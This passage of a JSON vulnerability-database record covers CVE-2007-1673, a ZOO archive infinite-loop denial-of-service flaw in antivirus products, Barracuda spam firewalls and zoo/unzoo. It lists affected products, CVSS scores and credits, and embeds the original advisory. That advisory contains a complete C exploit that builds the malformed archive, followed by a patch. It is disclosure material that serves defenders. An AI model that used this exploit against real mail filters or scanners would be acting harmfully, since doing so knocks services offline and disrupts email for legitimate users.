      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:panda:panda_antivirus:2007:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_200:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:4.6.394:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:4.7.652:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.691:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.691:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:picozip:picozip:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:panda:panda_antivirus_and_firewall:2007:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:unzoo:unzoo:4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_500:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_600:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:classic:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:4.7.700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.7.980",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1098:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir:7.04.00.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir_personal:7:*:classic:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.4.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.652:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.655:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.665:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.652:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.665:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.869:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:rahul_dhesi:zoo:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_800:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_900:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir_personal:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.3.0.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.603:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:windows:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2007-1673",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-1673",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-25035",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-1673",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200705-118",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-25035",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic:                  Multiple vendors ZOO file decompression infinite\n                         loop DoS\n\nAnnounced:              2007-05-04\nCredits:                Jean-Sebastien Guay-Leroux\nProducts:               Multiple (see section III)\nImpact:                 DoS (99% CPU utilisation)\nCVE ID:                 CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n                         CVE-2007-1672, CVE-2007-1673\n\n\nI.      BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII.  The vulnerability lies in the algorithm used to locate the\nfiles inside the archive.  Each file in a ZOO archive is identified by a\ndirentry structure.  Those structures are linked between themselves with a\n\u0027next\u0027 pointer.  This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure.  By specifying an\nalready processed file, it\u0027s possible to process more than one time this\nsame file.  The ZOO parser will then enter an infinite loop condition. \n\n\nIII.    AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV.     IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV.      SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n   They fixed this problem in virusdef 2.0.6399 for firmware \u003e= 3.4 and\n   2.0.6399o for firmware \u003c 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n   They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n   They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n   They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. \n\no zoo-2.10 - CVE-2007-1669:\n   This software is not maintained anymore.  A patch for version 2.10 is\n   provided in section VII of this advisory because some SMTP content\n   filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n   This software is not maintained anymore.  No patch is provided for this\n   software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI.     PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. \n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cstring.h\u003e\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE         0x0000002a\n\n#define ZH_TEXT                 0\n#define ZH_TAG                  20\n#define ZH_START_OFFSET         24\n#define ZH_NEG_START_OFFSET     28\n#define ZH_MAJ_VER              32\n#define ZH_MIN_VER              33\n#define ZH_ARC_HTYPE            34\n#define ZH_ARC_COMMENT          35\n#define ZH_ARC_COMMENT_LENGTH   39\n#define ZH_VERSION_DATA         41\n\n\n#define D_DIRENTRY_LENGTH       56\n\n#define D_TAG                   0\n#define D_TYPE                  4\n#define D_PACKING_METHOD        5\n#define D_NEXT_ENTRY            6\n#define D_OFFSET                10\n#define D_DATE                  14\n#define D_TIME                  16\n#define D_FILE_CRC              18\n#define D_ORIGINAL_SIZE         20\n#define D_SIZE_NOW              24\n#define D_MAJ_VER               28\n#define D_MIN_VER               29\n#define D_DELETED               30\n#define D_FILE_STRUCT           31\n#define D_COMMENT_OFFSET        32\n#define D_COMMENT_SIZE          36\n#define D_FILENAME              38\n#define D_VAR_DIR_LEN           51\n#define D_TIMEZONE              53\n#define D_DIR_CRC               54\n#define D_NAMLEN                ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN                ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME             ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n         *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data \u003e\u003e 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data \u003e\u003e 8);\n         put_byte (ptr + 2, data \u003e\u003e 16);\n         put_byte (ptr + 3, data \u003e\u003e 24);\n}\n\nFILE * open_file (char *filename) {\n\n         FILE *fp;\n\n         fp = fopen ( filename , \"w\" );\n\n         if (!fp) {\n                 perror (\"Cant open file\");\n                 exit (1);\n         }\n\n         return fp;\n}\n\nvoid usage (char *progname) {\n\n         printf (\"\\nTo use:\\n\");\n         printf (\"%s \u003carchive name\u003e\\n\\n\", progname);\n\n         exit (1);\n}\n\nint main (int argc, char *argv[]) {\n         FILE *fp;\n         char *hdr = (char *) malloc (4096);\n         char *filename = (char *) malloc (256);\n         int written_bytes;\n         int total_size;\n\n         if ( argc != 2) {\n                 usage ( argv[0] );\n         }\n\n         strncpy (filename, argv[1], 255);\n\n         if (!hdr || !filename) {\n                 perror (\"Error allocating memory\");\n                 exit (1);\n         }\n\n         memset (hdr, 0x00, 4096);\n\n         // Build a ZOO header\n         memcpy          (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n         put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);\n         put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n         put_longword    (hdr + ZH_NEG_START_OFFSET,\n             (ZOO_HEADER_SIZE) * -1);\n         put_byte        (hdr + ZH_MAJ_VER, 2);\n         put_byte        (hdr + ZH_MIN_VER, 0);\n         put_byte        (hdr + ZH_ARC_HTYPE, 1);\n         put_longword    (hdr + ZH_ARC_COMMENT, 0);\n         put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n         put_byte        (hdr + ZH_VERSION_DATA, 3);\n\n         // Build vulnerable direntry struct\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n         memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n                             \"AAAAAAAA.AAA\", 13);\n\n         total_size = ZOO_HEADER_SIZE + 51;\n\n         fp = open_file (filename);\n\n         if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n                 printf (\"The file has been written\\n\");\n         } else {\n                 printf (\"Cant write to the file\\n\");\n                 exit (1);\n         }\n\n         fclose (fp);\n\n         return 0;\n}\n\n\nVII.    PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing.  This will\nguarantee the fact that it\u0027s not possible to process the same files over\nand over again.  Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c        1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c        2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n  #endif\n  struct direntry direntry;                 /* directory entry */\n  int first_dir = 1;\n  /* first dir entry seen? */\n+unsigned long zoo_pointer = 0;                     /* Track our position\nin the file */\n\n  static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n  static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n                 exit_status = 1;\n     }\n     zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n     begins */\n+\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n  }\n\n  #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n     } /* end if */\n\n  loop_again:\n+\n+   /* Make sure we are not seeking to already processed data */\n+   if (next_ptr \u003c= zoo_pointer)\n+          prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+   zoo_pointer = next_ptr;\n+\n     zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n  } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c       1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c       2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n  int show_mode = 0;                             /* show file protection */\n  #endif\n  int first_dir = 1;                             /* if first direntry -- to\n  adjust dat_ofs */\n+unsigned long zoo_pointer = 0;         /* Track our position in the file\n*/\n\n  while (*option) {\n     switch (*option) {\n@@ -211,6 +212,9 @@\n                 show_acmt (\u0026zoo_header, zoo_file, 0);           /* show\n                 archive comment */\n         }\n\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n+\n     /* Seek to the beginning of the first directory entry */\n     if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n        ercount++;\n@@ -437,6 +441,11 @@\n           if (verb_list \u0026\u0026 !fast)\n              show_comment (\u0026direntry, zoo_file, 0, (char *) NULL);\n        } /* end if (lots of conditions) */\n+\n+      /* Make sure we are not seeking to already processed data */\n+      if (direntry.next \u003c= zoo_pointer)\n+               prterror (\u0027f\u0027, \"ZOO chain structure is corrupted\\n\");\n+      zoo_pointer = direntry.next;\n\n                 /* ..seek to next dir entry */\n        zooseek (zoo_file, direntry.next, 0);\n\n\nVIII.   CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX.     REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX.      HISTORY\n\n2006-09-??  : Vulnerability is found\n2007-03-19  : All vendors notified\n2007-03-19  : Barracuda Networks provided a fix\n2007-03-22  : Avira provided a fix\n2007-04-02  : Panda Antivirus provided a fix\n2007-04-14  : avast! antivirus provided a fix\n2007-05-04  : Public disclosure\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-1673",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "23823",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "25315",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "36208",
        "trust": 1.7
      },
      {
        "db": "SREASON",
        "id": "2680",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "34080",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-25035",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "56479",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ]
  },
  "id": "VAR-200705-0187",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25035"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:12:33.864000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://amavis.org/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/23823"
      },
      {
        "trust": 1.7,
        "url": "http://www.amavis.org/security/asa-2007-2.txt"
      },
      {
        "trust": 1.7,
        "url": "http://osvdb.org/36208"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/25315"
      },
      {
        "trust": 1.7,
        "url": "http://securityreason.com/securityalert/2680"
      },
      {
        "trust": 1.1,
